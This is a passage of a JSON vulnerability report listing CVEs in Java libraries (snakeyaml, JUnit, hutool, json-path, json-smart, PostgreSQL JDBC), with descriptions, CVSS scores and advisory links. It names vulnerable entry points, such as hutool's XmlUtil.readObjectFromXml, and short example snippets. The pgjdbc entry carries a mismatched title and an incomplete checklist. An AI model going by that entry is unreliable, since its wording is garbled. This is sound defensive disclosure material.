Description","text":"Snakeyaml vulnerable to Stack overflow leading to denial of service"},{"category":"details","details":"Vulnerability Details","text":"# Snakeyaml vulnerable to Stack overflow leading to denial of service Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. 
This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]},"references":[{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DDXEXXWAZGF5AVHIPGFPXIWL6TSMKJE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7MKE4XWRXTH32757H7QJU4ACS67DYDCR"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSPAJ5Y45A4ZDION2KN5RDWLHK4XKY2J"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41854"},{"summary":"NetApp Advisory ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"},{"summary":"NetApp Advisory 
ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-41854/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15250"]}],"cve":"CVE-2020-15250","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2020-10-12T17:33:00","ids":[{"system_name":"CVE Record","text":"CVE-2020-15250"},{"system_name":"GitHub Advisory","text":"GHSA-269g-pwp5-87pp"},{"system_name":"Junit Advisory","text":"TemporaryFolder"},{"system_name":"Oracle Advisory","text":"cpuapr2022"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Permission Assignment for Critical Resource","title":"Additional CWE: 732"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files ### Vulnerability The JUnit4 test rule 
[TemporaryFolder](https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html) contains a local information disclosure vulnerability. Example of vulnerable code: ```java public static class HasTempFolder { @Rule public TemporaryFolder folder = new TemporaryFolder(); @Test public void testUsingTempFolder() throws IOException { folder.getRoot(); // Previous file permissions: `drwxr-xr-x`; After fix:`drwx------` File createdFile= folder.newFile(\"myfile.txt\"); // unchanged/irrelevant file permissions File createdFolder= folder.newFolder(\"subfolder\"); // unchanged/irrelevant file permissions // ... } } ``` ### Impact On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability **does not** allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. When analyzing the impact of this vulnerability, here are the important questions to ask: 1. Do the JUnit tests write sensitive information, like API keys or passwords, into the temporary folder? - If yes, this vulnerability impacts you, but only if you also answer 'yes' to question 2. - If no, this vulnerability does not impact you. 2. Do the JUnit tests ever execute in an environment where the OS has other untrusted users. _This may apply in CI/CD environments but normally won't be 'yes' for personal developer machines._ - If yes, and you answered 'yes' to question 1, this vulnerability impacts you. - If no, this vulnerability does not impact you. ### Patches Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. - Java 1.7 and higher users: this vulnerability is fixed in 4.13.1. 
- Java 1.6 and lower users: **no patch is available, you must use the workaround below.** ### Workarounds If you are unable to patch, or are stuck running on Java 1.6, specifying the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. ### References - [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) - Fix commit https://github.com/junit-team/junit4/commit/610155b8c22138329f0723eec22521627dbc52ae #### Similar Vulnerabilities - Google Guava - https://github.com/google/guava/issues/4011 - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824 ### For more information If you have any questions or comments about this advisory, please pen an issue in [junit-team/junit4](https://github.com/junit-team/junit4/issues)."}],"product_status":{"known_affected":["junit/junit@vers:maven/>=4.7|<4.13.1"],"known_not_affected":["junit/junit@4.13.1"]},"references":[{"summary":"GitHub Advisory GHSA-269g-pwp5-87pp","url":"https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp"},{"summary":"Junit Advisory TemporaryFolder","url":"https://junit.org/junit4/javadoc/4.13/org/junit/rules/TemporaryFolder.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01110833b63616ddbef59ae4e10c0fbd0060f0a51206defd4cb4d917@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r09cfbb5aedd76023691bbce9ca4ce2e16bb07dd37554a17efc19935d@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1209986f79359b518d09513ff05a88e5b3c398540e775edea76a4774@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r29d703d1986d9b871466ff24082a1828ac8ad27bb0965a93a383872e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b78f23bc2711a76a7fc73ad67b7fcd6817c5cfccefd6f30a4f54943@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r30f502d2f79e8d635361adb8108dcbb73095163fcbd776ee7984a094@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r500517c23200fb2fdb0b82770a62dd6c88b3521cfb01cfd0c76e3f8b@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8841507576f595bb783ccec6a7cb285ea90d4e6f5043eae0e61a41@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r687f489b10b0d14e46f626aa88476545e1a2600b24c4ebd3c0d2a10b@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r717877028482c55acf604d7a0106af4ca05da4208c708fb157b53672@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742b44fd75215fc75963b8ecc22b2e4372e68d67d3d859d2b5e8743f@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8b02dc6f18df11ff39eedb3038f1e31e6f90a779b1959bae65107279@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r925eaae7dd8f77dd61eefc49c1fcf54bd9ecfe605486870d7b1e9390@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r934208a520b38f5cf0cae199b6b076bfe7d081809528b0eff2459e40@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95f8ef60c4b3a5284b647bb3132cda08e6fadad888a66b84f49da0b0@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/r9710067c7096b83cb6ae8f53a2f6f94e9c042d1bf1d6929f8f2a2b7a@%3Ccommits.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra1bdb9efae84794e8ffa2f8474be8290ba57830eefe9714b95da714b@%3Cdev.pdfbox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raebf13f53cd5d23d990712e3d11c80da9a7bae94a6284050f148ed99@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2771949c676ca984e58a5cd5ca79c2634dee1945e0406e48e0f8457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2ffe2993f4dccc48d832e1a0f1c419477781b6ea16e725ca2276dbb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbaec90e699bc7c7bd9a053f76707a36fda48b6d558f31dc79147dbf9@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc49cf1547ef6cac1be4b3c92339b2cae0acacf5acaba13cfa429a872@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdbdd30510a7c4d0908fd22075c02b75bbc2e0d977ec22249ef3133cb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde385b8b53ed046600ef68dd6b4528dea7566aaddb02c3e702cc28bc@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rde8e70b95c992378e8570e4df400c6008a9839eabdfb8f800a3e5af6@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rdef7d1380c86e7c0edf8a0f89a2a8db86fce5e363457d56b722691b4@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea812d8612fdc46842a2a57248cad4b01ddfdb1e9b037c49e68fdbfb@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reb700e60b9642eafa4b7922bfee80796394135aa09c7a239ef9f7486@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf2ec93f4ca9a97d1958eb4a31b1830f723419ce9bf2018a6e5741d5b@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6e5d894d4b03bef537c9d6641272e0197c047c0d1982b4e176d0353@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf797d119cc3f51a8d7c3c5cbe50cb4524c8487282b986edde83a9467@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00003.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15250"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":4.4,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":4.4,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":4.4,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N","version":"3.1"},"products":["junit/junit@vers:maven/>=4.7|<4.13.1"]}],"title":"CVE-2020-15250/pkg:maven/junit/junit@4.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24163"]}],"cve":"CVE-2023-24163","cwe":{"id":"89","name":"Improper Neutralization of Special Elements used in an SQL Command"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24163"},{"system_name":"Gitee Advisory","text":"I6AJWJ"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara hutool vulnerable to SQL Injection"},{"category":"details","details":"Vulnerability Details","text":"# Dromara hutool vulnerable to SQL Injection SQL Inection vulnerability in Dromara hutool v5.8.11 allows attacker to execute arbitrary code via the aviator template engine."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"],"known_not_affected":["cn.hutool/hutool-all@5.8.21"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory 
I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_15801868"},{"summary":"Gitee Advisory I6AJWJ","url":"https://gitee.com/dromara/hutool/issues/I6AJWJ#note_20057806_link"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24163"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<5.8.21"]}],"title":"CVE-2023-24163/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-24162"]}],"cve":"CVE-2023-24162","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-01-31T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-24162"},{"system_name":"Gitee Advisory","text":"I6AEX2"},{"system_name":"Gitee Advisory","text":"hutool"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Dromara Hutool Deserialization of Untrusted Data vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Dromara Hutool Deserialization of Untrusted Data vulnerability Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the 
XmlUtil.readObjectFromXml parameter."}],"product_status":{"known_affected":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]},"references":[{"summary":"Gitee Advisory hutool","url":"https://gitee.com/dromara/hutool"},{"summary":"Gitee Advisory I6AEX2","url":"https://gitee.com/dromara/hutool/issues/I6AEX2"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-24162"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["cn.hutool/hutool-all@vers:maven/>=0.0.0|<=5.8.11"]}],"title":"CVE-2023-24162/pkg:maven/cn.hutool/hutool-all@5.8.10?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-51074"]}],"cve":"CVE-2023-51074","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2023-12-27T21:31:01","ids":[{"system_name":"CVE Record","text":"CVE-2023-51074"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-path Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# json-path Out-of-bounds Write vulnerability json-path v2.8.0 was discovered to contain a stack overflow via the `Criteria.parse()` 
method."}],"product_status":{"known_affected":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"],"known_not_affected":["com.jayway.jsonpath/json-path@2.9.0"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-51074"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["com.jayway.jsonpath/json-path@vers:maven/>=2.2.0|<2.9.0"]}],"title":"CVE-2023-51074/pkg:maven/com.jayway.jsonpath/json-path@2.2.0?type=jar"},{"cve":"CVE-2023-1370","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-23T20:32:03","ids":[{"system_name":"CVE Record","text":"CVE-2023-1370"},{"system_name":"GitHub Advisory","text":"GHSA-493p-pfq6-5258"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-NETMINIDEV-3369748"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"JFrog Advisory","text":"stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"json-smart Uncontrolled Recursion vulnerabilty"},{"category":"details","details":"Vulnerability Details","text":"# json-smart Uncontrolled Recursion vulnerabilty ### Impact Affected versions 
of [net.minidev:json-smart](https://github.com/netplex/json-smart-v1) are vulnerable to Denial of Service (DoS) due to a StackOverflowError when parsing a deeply nested JSON array or object. When reaching a ‘[‘ or ‘{‘ character in the JSON input, the code parses an array or an object respectively. It was discovered that the 3PP does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause stack exhaustion (stack overflow) and crash the software. ### Patches This vulnerability was fixed in json-smart version 2.4.9, but the maintainer recommends upgrading to 2.4.10, due to a remaining bug. ### Workarounds N/A ### References - https://www.cve.org/CVERecord?id=CVE-2023-1370 - https://nvd.nist.gov/vuln/detail/CVE-2023-1370 - https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"],"known_not_affected":["net.minidev/json-smart@2.4.10"]},"references":[{"summary":"GitHub Advisory GHSA-493p-pfq6-5258","url":"https://github.com/oswaldobapvicjr/jsonmerge/security/advisories/GHSA-493p-pfq6-5258"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1370"},{"summary":"JFrog Advisory stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633","url":"https://research.jfrog.com/vulnerabilities/stack-exhaustion-in-json-smart-leads-to-denial-of-service-when-parsing-malformed-json-xray-427633"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Snyk Advisory SNYK-JAVA-NETMINIDEV-3369748","url":"https://security.snyk.io/vuln/SNYK-JAVA-NETMINIDEV-3369748"},{"summary":"Cve 
2023","url":"https://www.cve.org/CVERecord?id=CVE-2023-1370"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=1.0.6.3|<=2.4.8"]}],"title":"CVE-2023-1370/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-27568"]}],"cve":"CVE-2021-27568","cwe":{"id":"754","name":"Improper Check for Unusual or Exceptional Conditions"},"discovery_date":"2021-06-16T18:03:47","ids":[{"system_name":"CVE Record","text":"CVE-2021-27568"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Check for Unusual or Exceptional Conditions in json-smart"},{"category":"details","details":"Vulnerability Details","text":"# Improper Check for Unusual or Exceptional Conditions in json-smart An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. 
When it is not caught, it may cause programs using the library to crash or expose sensitive information."}],"product_status":{"known_affected":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"],"known_not_affected":["net.minidev/json-smart@2.3.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6287f5aa628c8d9af52b5401ec6cc51b6fc28ab20d318943453e396@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re237267da268c690df5e1c6ea6a38a7fc11617725e8049490f58a6fa@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf70210b4d63191c0bfb2a0d5745e104484e71703bf5ad9cb01c980c6@%3Ccommits.druid.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-27568"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["net.minidev/json-smart@vers:maven/>=2.0.0|<2.3.1"]}],"title":"CVE-2021-27568/pkg:maven/net.minidev/json-smart@2.2.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41946"]}],"cve":"CVE-2022-41946","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2022-11-23T22:17:25","ids":[{"system_name":"CVE Record","text":"CVE-2022-41946"},{"system_name":"GitHub Advisory","text":"GHSA-562r-vg33-8x8h"},{"system_name":"NetApp Advisory","text":"ntap-20240329-0003"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"TemporaryFolder on unix-like systems does not limit access to created files"},{"category":"details","details":"Vulnerability Details","text":"# TemporaryFolder on unix-like systems does not limit access to created files **Vulnerability** `PreparedStatement.setText(int, InputStream)` and `PreparedStatemet.setBytea(int, InputStream)` will create a temporary file if the InputStream is larger than 51k Example of 
vulnerable code: ```java String s = \"some very large string greater than 51200 bytes\"; PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) ); ``` This will create a temporary file which is readable by other users on Unix like systems, but not MacOS. Impact On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability. When analyzing the impact of this vulnerability, here are the important questions to ask: Is the driver running in an environment where the OS has other untrusted users. If yes, and you answered 'yes' to question 1, this vulnerability impacts you. If no, this vulnerability does not impact you. Patches Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using. Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1 Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7 Java 1.6 and lower users: no patch is available; you must use the workaround below. Workarounds If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability. 
References [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html) Fix commit https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5 Similar Vulnerabilities Google Guava - https://github.com/google/guava/issues/4011 Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945 JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824 ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-41946, CVE-2022-41946"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.8"],"known_not_affected":["org.postgresql/postgresql@42.3.8"]},"references":[{"summary":"GitHub Advisory GHSA-562r-vg33-8x8h","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD"},{"summary":"Fedora Project Mailing 